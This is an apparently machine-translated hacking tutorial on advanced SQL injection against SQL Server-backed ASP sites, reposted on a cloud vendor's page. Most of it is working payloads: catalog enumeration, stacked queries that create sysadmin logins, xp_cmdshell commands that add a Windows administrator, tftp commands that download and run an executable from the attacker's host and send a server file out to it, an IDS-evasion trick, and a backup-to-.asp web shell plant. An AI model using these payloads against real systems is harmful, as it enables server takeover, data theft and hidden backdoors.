Guilin veterans ' advanced injection techniques for SQL Server

Source: Internet
Author: User
Tags sql net sql server injection table name version
server|sqlserver| Advanced | Skills now put veterans ' own years of SQL Server into advanced skills to support veterans ' friends:


Objective:
This is the advanced technique, and the other basic injection methods are not detailed.
Can not read the injection of this site to the basic article.
In order to better use the injection, we suggest that we take a look at this site's SQL grammar related articles


[Get all database names]
The value of select name from master.dbo.sysdatabases where Dbid=7//dbid is more than 7 is a user database


[Get data table name] [Update the field value to the table name, and then try to read out the value of the field to get the table name]
Select top 1 name from database name. dbo.sysobjects where xtype= ' U ' and status>0 and name not in (' table ')


[Get Data table field name] [Update the field value to the field name, and then try to read out the value of the field to get the field name]
Select top 1 database name. Dbo.col_name (object_id (' data table name to query '), field column such as: 1 [Where Condition]


Build database administrator account and system administrator account through SQL Server Injection vulnerability [current account must be sysadmin group]


News.asp?id=2;exec Master.dbo.sp_addlogin test,test;--//Add database user User test, password is test
News.asp?id=2;exec Master.dbo.sp_password test,123456,test;--//If you want to change the password, use this sentence (change the password of test to 123456)
News.asp?id=2;exec Master.dbo.sp_addsrvrolemember test,sysadmin;--//Add test to the sysadmin group, the members of this group can perform any action
News.asp?id=2;exec Master.dbo.xp_cmdshell ' net user Test Test/add ';--//Add System user test, password is test
News.asp?id=2;exec Master.dbo.xp_cmdshell ' net localgroup Administrators Test/add ';--promote system user test to Administrator


So, you've left the test administrator account in his database and system.


Here's how to download a file from your file.exe to run it [if you have to set your computer as a TFTP server, open 69 ports]


id=2; exec master.dbo.xp_cmdshell ' tftp–i your IP get file.exe ';--


Then run this file:
id=2; exec master.dbo.xp_cmdshell ' file.exe ';--


Download server file File2.doc to local TFTP server [file must exist]:


id=2; exec master.dbo.xp_cmdshell ' tftp–i your IP put File2.doc ';--


Bypass IDs detection [using variables]
declare @a sysname set @a= ' xp_ ' + ' Cmdshell ' exec @a ' dir c:\ '
declare @a sysname set @a= ' xp ' + ' _cm ' + ' Dshell ' exec @a ' dir c:\ '


The new addition:


Build a table. There is only one field, the type is image, and the ASP content is written. Export Database as File
Backup Database dbname to disk= ' d:\web\db.asp ';


Error to get system OS and database system version number
id=2 and 1<> (select @ @VERSION);


Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.